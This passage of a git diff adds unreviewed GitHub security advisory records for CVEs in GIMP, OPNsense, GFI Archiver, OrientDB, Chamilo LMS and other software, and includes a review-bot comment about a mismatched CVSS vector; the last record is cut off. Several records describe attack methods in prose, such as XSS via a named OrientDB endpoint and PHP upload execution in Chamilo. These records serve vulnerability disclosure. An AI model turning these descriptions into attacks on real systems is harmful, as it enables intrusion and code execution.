a/advisories/unreviewed/2026/02/GHSA-4cqv-6xj6-7w79/GHSA-4cqv-6xj6-7w79.json b/advisories/unreviewed/2026/02/GHSA-4cqv-6xj6-7w79/GHSA-4cqv-6xj6-7w79.json new file mode 100644 index 0000000000000..71279c4406c6c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4cqv-6xj6-7w79/GHSA-4cqv-6xj6-7w79.json 
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4cqv-6xj6-7w79",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2026-2034"
+ ],
+ "details": "Sante DICOM Viewer Pro DCM File Parsing Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sante DICOM Viewer Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of DCM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28129.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2034"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-104"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-120"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4jqp-h8f8-5fh9/GHSA-4jqp-h8f8-5fh9.json b/advisories/unreviewed/2026/02/GHSA-4jqp-h8f8-5fh9/GHSA-4jqp-h8f8-5fh9.json
new file mode 100644
index 0000000000000..fc5daae8ef597
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4jqp-h8f8-5fh9/GHSA-4jqp-h8f8-5fh9.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4jqp-h8f8-5fh9",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2026-2490"
+ ],
+ "details": "RustDesk Client for Windows Transfer File Link Following Information Disclosure Vulnerability. This vulnerability allows local attackers to disclose sensitive information on affected installations of RustDesk Client for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Transfer File feature. By uploading a symbolic link, an attacker can abuse the service to read arbitrary files. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM. Was ZDI-CAN-27909.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2490"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rustdesk/rustdesk/pull/13736"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-117"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-59"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-59vc-4mm8-j289/GHSA-59vc-4mm8-j289.json b/advisories/unreviewed/2026/02/GHSA-59vc-4mm8-j289/GHSA-59vc-4mm8-j289.json
new file mode 100644
index 0000000000000..d650fcd596d81
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-59vc-4mm8-j289/GHSA-59vc-4mm8-j289.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-59vc-4mm8-j289",
+ "modified": "2026-02-21T00:31:42Z",
+ "published": "2026-02-21T00:31:42Z",
+ "aliases": [
+ "CVE-2018-25158"
+ ],
+ "details": "Chamilo LMS 1.11.8 contains an arbitrary file upload vulnerability that allows authenticated users to upload and execute PHP files through the elfinder filemanager module. Attackers can upload files with image headers in the social myfiles section, rename them to PHP extensions, and execute arbitrary code by accessing the uploaded files.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25158"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/chamilo/chamilo-lms"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/47423"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/chamilo-lms-arbitrary-file-upload-via-elfinder"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-65c4-vf29-7265/GHSA-65c4-vf29-7265.json b/advisories/unreviewed/2026/02/GHSA-65c4-vf29-7265/GHSA-65c4-vf29-7265.json
new file mode 100644
index 0000000000000..227fba5a12b86
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-65c4-vf29-7265/GHSA-65c4-vf29-7265.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-65c4-vf29-7265",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:42Z",
+ "aliases": [
+ "CVE-2019-25447"
+ ],
+ "details": "OrientDB 3.0.17 GA Community Edition contains cross-site request forgery vulnerabilities that allow attackers to perform unauthorized actions by crafting malicious requests to endpoints like /database/, /command/, and /document/. Attackers can create or delete databases, modify schema classes, manage users, and create functions by sending authenticated requests without token validation, combined with reflected and stored cross-site scripting vulnerabilities in the web interface.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25447"
+ },
+ {
+ "type": "WEB",
+ "url": "https://orientdb.dev"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/46517"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/orientdb-cross-site-request-forgery"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-6q4c-4x29-76qv/GHSA-6q4c-4x29-76qv.json b/advisories/unreviewed/2026/02/GHSA-6q4c-4x29-76qv/GHSA-6q4c-4x29-76qv.json
new file mode 100644
index 0000000000000..42eb7bab1e005
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-6q4c-4x29-76qv/GHSA-6q4c-4x29-76qv.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6q4c-4x29-76qv",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2026-2035"
+ ],
+ "details": "Deciso OPNsense diag_backup.php filename Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Deciso OPNsense. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of backup configuration files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-28131.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2035"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/opnsense/core/commit/cb15c935137d05c86a1e6cf12af877e9c32a23af"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-078"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7c63-32m9-7mfg/GHSA-7c63-32m9-7mfg.json b/advisories/unreviewed/2026/02/GHSA-7c63-32m9-7mfg/GHSA-7c63-32m9-7mfg.json
new file mode 100644
index 0000000000000..1b2d7e9babfcf
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7c63-32m9-7mfg/GHSA-7c63-32m9-7mfg.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7c63-32m9-7mfg",
+ "modified": "2026-02-21T00:31:42Z",
+ "published": "2026-02-21T00:31:42Z",
+ "aliases": [
+ "CVE-2026-0797"
+ ],
+ "details": "GIMP ICO File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ICO files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28599.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0797"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/69cc6b1a6645dc9c4d7b484483dbe6a84b922b9c"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-050"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-122"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T22:16:19Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7h2v-5mq4-f627/GHSA-7h2v-5mq4-f627.json b/advisories/unreviewed/2026/02/GHSA-7h2v-5mq4-f627/GHSA-7h2v-5mq4-f627.json
new file mode 100644
index 0000000000000..3add75036fd24
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7h2v-5mq4-f627/GHSA-7h2v-5mq4-f627.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7h2v-5mq4-f627",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2026-2037"
+ ],
+ "details": "GFI Archiver MArc.Core Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GFI Archiver. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the configuration of the MArc.Core.Remoting.exe process, which listens on port 8017. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-27935.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2037"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-074"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8j7g-rjc3-pcjw/GHSA-8j7g-rjc3-pcjw.json b/advisories/unreviewed/2026/02/GHSA-8j7g-rjc3-pcjw/GHSA-8j7g-rjc3-pcjw.json
new file mode 100644
index 0000000000000..6cab6c6468868
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8j7g-rjc3-pcjw/GHSA-8j7g-rjc3-pcjw.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8j7g-rjc3-pcjw",
+ "modified": "2026-02-21T00:31:42Z",
+ "published": "2026-02-21T00:31:42Z",
+ "aliases": [
+ "CVE-2019-25437"
+ ],
+ "details": "Foscam Video Management System 1.1.6.6 contains a buffer overflow vulnerability in the UID field that allows local attackers to crash the application by supplying an excessively long string. Attackers can input a 5000-character buffer into the UID parameter during device addition to trigger an application crash when the Login Check function is invoked.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25437"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/47478"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.foscam.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/foscam-video-management-system-buffer-overflow-denial-of-service"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8pcr-7mgm-xjqp/GHSA-8pcr-7mgm-xjqp.json b/advisories/unreviewed/2026/02/GHSA-8pcr-7mgm-xjqp/GHSA-8pcr-7mgm-xjqp.json
new file mode 100644
index 0000000000000..783b580d1fe3b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8pcr-7mgm-xjqp/GHSA-8pcr-7mgm-xjqp.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8pcr-7mgm-xjqp",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2019-25449"
+ ],
+ "details": "OrientDB 3.0.17 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted JSON payloads to the document endpoint. Attackers can send POST requests to /document/demodb/-1:-1 with script tags in the name parameter to execute arbitrary JavaScript in users' browsers.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25449"
+ },
+ {
+ "type": "WEB",
+ "url": "https://orientdb.dev"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/46517"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/orientdb-reflected-cross-site-scripting-via-document-endpoint"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8r4q-6953-w8gp/GHSA-8r4q-6953-w8gp.json b/advisories/unreviewed/2026/02/GHSA-8r4q-6953-w8gp/GHSA-8r4q-6953-w8gp.json
new file mode 100644
index 0000000000000..166d9914a7dd8
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8r4q-6953-w8gp/GHSA-8r4q-6953-w8gp.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8r4q-6953-w8gp",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2026-2036"
+ ],
+ "details": "GFI Archiver MArc.Store Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GFI Archiver. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the configuration of the MArc.Store.Remoting.exe process. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-27936.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2036"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-076"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8w2x-hhv3-2m76/GHSA-8w2x-hhv3-2m76.json b/advisories/unreviewed/2026/02/GHSA-8w2x-hhv3-2m76/GHSA-8w2x-hhv3-2m76.json
new file mode 100644
index 0000000000000..c7b68d5793e1f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8w2x-hhv3-2m76/GHSA-8w2x-hhv3-2m76.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8w2x-hhv3-2m76",
+ "modified": "2026-02-21T00:31:42Z",
+ "published": "2026-02-21T00:31:42Z",
+ "aliases": [
+ "CVE-2019-25434"
+ ],
+ "details": "SpotAuditor 5.3.1.0 contains a denial of service vulnerability that allows unauthenticated attackers to crash the application by submitting excessive data in the registration name field. Attackers can enter a large string of characters (5000 bytes or more) in the name field during registration to trigger an unhandled exception that crashes the application.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25434"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/47494"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/spotauditor-denial-of-service-via-registration-name-field"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.nsauditor.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-974r-v62q-8fqc/GHSA-974r-v62q-8fqc.json b/advisories/unreviewed/2026/02/GHSA-974r-v62q-8fqc/GHSA-974r-v62q-8fqc.json
new file mode 100644
index 0000000000000..efea9c10aaf5a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-974r-v62q-8fqc/GHSA-974r-v62q-8fqc.json
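Review bot: In the GHSA-8w2x-hhv3-2m76 record the `CVSS_V3` vector rates the attack as network-reachable (`AV:N`) while the `CVSS_V4` vector in the same `severity` array uses `AV:L` with `UI:A`, and `database_specific.severity` is `MODERATE`, which fits the local reading rather than an `AV:N` denial of service with `A:H`. `details` describes entering a long string in the application's registration name field, which reads as local input; if that is right the V3 entry would be `CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`, the form the Foscam record GHSA-8j7g-rjc3-pcjw uses for a similar crash. Consumers that prioritise on the V3 vector will otherwise rank this higher than the record's own severity label.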
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-974r-v62q-8fqc",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2026-2048"
+ ],
+ "details": "GIMP XWD File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of XWD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28591.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2048"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2586/diffs?commit_id=57712677007793118388c5be6fb8231f22a2b341"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-121"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-787"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9j8v-79v3-wcmp/GHSA-9j8v-79v3-wcmp.json b/advisories/unreviewed/2026/02/GHSA-9j8v-79v3-wcmp/GHSA-9j8v-79v3-wcmp.json
new file mode 100644
index 0000000000000..9920330388421
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9j8v-79v3-wcmp/GHSA-9j8v-79v3-wcmp.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9j8v-79v3-wcmp",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2026-2040"
+ ],
+ "details": "PDF-XChange Editor TrackerUpdate Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of PDF-XChange Editor. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the TrackerUpdate process. The product loads a library from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of a target user. Was ZDI-CAN-27788.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2040"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-122"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-427"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9pq7-r6qx-2rhf/GHSA-9pq7-r6qx-2rhf.json b/advisories/unreviewed/2026/02/GHSA-9pq7-r6qx-2rhf/GHSA-9pq7-r6qx-2rhf.json
new file mode 100644
index 0000000000000..8535f7bb34574
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9pq7-r6qx-2rhf/GHSA-9pq7-r6qx-2rhf.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9pq7-r6qx-2rhf",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2026-2044"
+ ],
+ "details": "GIMP PGM File Parsing Uninitialized Memory Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PGM files. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28158.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2044"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2569/diffs?commit_id=112a5e038f0646eae5ae314988ec074433d2b365"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-118"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-908"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9xmv-j327-gw5g/GHSA-9xmv-j327-gw5g.json b/advisories/unreviewed/2026/02/GHSA-9xmv-j327-gw5g/GHSA-9xmv-j327-gw5g.json
new file mode 100644
index 0000000000000..e5abf24639e31
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9xmv-j327-gw5g/GHSA-9xmv-j327-gw5g.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9xmv-j327-gw5g",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2026-2492"
+ ],
+ "details": "TensorFlow HDF5 Library Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of TensorFlow. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of plugins. The application loads plugins from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-25480.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
